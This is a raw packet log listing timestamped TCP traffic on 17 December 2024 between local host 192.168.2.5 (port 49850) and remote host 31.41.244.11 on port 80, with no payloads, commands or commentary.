Dec 17, 2024 06:03:23.579881907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.579950094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.580003977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.580104113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.581020117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.581075907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.581114054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.581157923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.582294941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.582308054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.582401037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.583235025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.583338976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.583353996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.583465099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.584347010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.584455967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.584475994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.584506035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.585465908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.585525036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.585577965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.585649014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.586575985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.586632013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.586672068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.586802959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.587743044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.587801933 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.587872028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.587997913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.588773966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.588877916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.588910103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.588949919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.588962078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.589109898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.590013981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.590102911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.590121984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.590179920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.590873003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.591012001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.591020107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.591335058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.592015982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.592081070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.592135906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.592286110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.593126059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.593192101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.593235016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.593372107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.594222069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.594278097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.594336987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.594432116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.595319033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.595402002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.595428944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.595474958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.596437931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.596484900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.596548080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.596610069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.597567081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.597677946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.597697020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.597847939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.598669052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.598731041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.598750114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.598782063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.599728107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.599777937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.733951092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.734087944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.734157085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.734157085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.734508991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.734611034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.734635115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.734811068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.735418081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.735472918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.735521078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.735533953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.736479044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.736569881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.736588955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.736784935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.737545013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.737649918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.737669945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.737735033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.739065886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.739120007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.739161968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.739212036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.740277052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.740308046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.740324020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.740380049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.741130114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.741192102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.741209030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.741240025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.742042065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.742109060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.742115974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.742175102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.743124962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.743233919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.743257999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.743315935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.744263887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.744339943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.744378090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.744456053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.745335102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.745430946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.745491982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.745534897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.746438026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.746536970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.746553898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.746682882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.747602940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.747658014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.747705936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.747749090 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.748675108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.748722076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.748784065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.748830080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.749793053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.749866009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.749891043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.749969959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.750924110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.750967026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.750988960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.751077890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.752037048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.752142906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.752146959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.752197027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.753156900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.753268957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.753273964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.753355026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.754244089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.754329920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.754344940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.754395008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.755361080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.755465984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.755502939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.755502939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.756477118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.756546974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.756577015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.757015944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.757654905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.757704973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.757744074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.758140087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.758698940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.758779049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.758830070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.759088993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.759831905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.759927988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.759943008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.760101080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.760968924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.761034012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.761178017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.761265039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.762059927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.762115002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.762231112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.762271881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.763174057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.763214111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.763283968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.763329029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.764266968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.764368057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.764437914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.764486074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.765384912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.765458107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.765507936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.765770912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.766494989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.766551971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.766588926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.766644955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.767615080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.767683983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.767786026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.767858028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.768826008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.768857002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.768882036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.768938065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.769840956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.769885063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.769938946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.769979954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.770948887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.770992994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.771045923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.771132946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.772067070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.772118092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.772192001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.772247076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.773164988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.773221016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.773304939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.773475885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.774323940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.774384022 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.774419069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.774471045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.775432110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.775526047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.775553942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.775609016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.776529074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.776590109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.776638985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.776686907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.777612925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.777659893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.777754068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.777803898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.778739929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.778829098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.778868914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.779081106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.779859066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.779989004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.780002117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.780162096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.780950069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.781029940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.781339884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.781404972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.781444073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.781512022 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.782428026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.782495975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.782533884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.782592058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.783535957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.783579111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.783643961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.783695936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.784651995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.784761906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.784785032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.784879923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.785749912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.785866976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.785876036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.785960913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.786866903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.786945105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.786962032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.787054062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.787970066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.788033009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.788086891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.788170099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.789176941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.789249897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.789310932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.789351940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.790210962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.790258884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.790326118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.790430069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.791354895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.791410923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.791454077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.791510105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.927000046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.927097082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.927105904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.927187920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.927515984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.927584887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.927829027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.927829027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.928627968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.928713083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.928889990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.928889990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.929713011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.929837942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.929876089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.929876089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.930850029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.931000948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.931018114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.931058884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.931962967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.932079077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.932099104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.932332993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.933068037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.933144093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.933191061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.933418036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.934282064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.934427023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.934447050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.934503078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.935308933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.935359955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.935425043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.935612917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.936455965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.936569929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.936667919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.936667919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.937534094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.937654018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.937736988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.937736988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.938610077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.938751936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.938788891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.938788891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.939753056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.939845085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.939862967 CET	49850	80	192.168.2.5	31.41.244.11
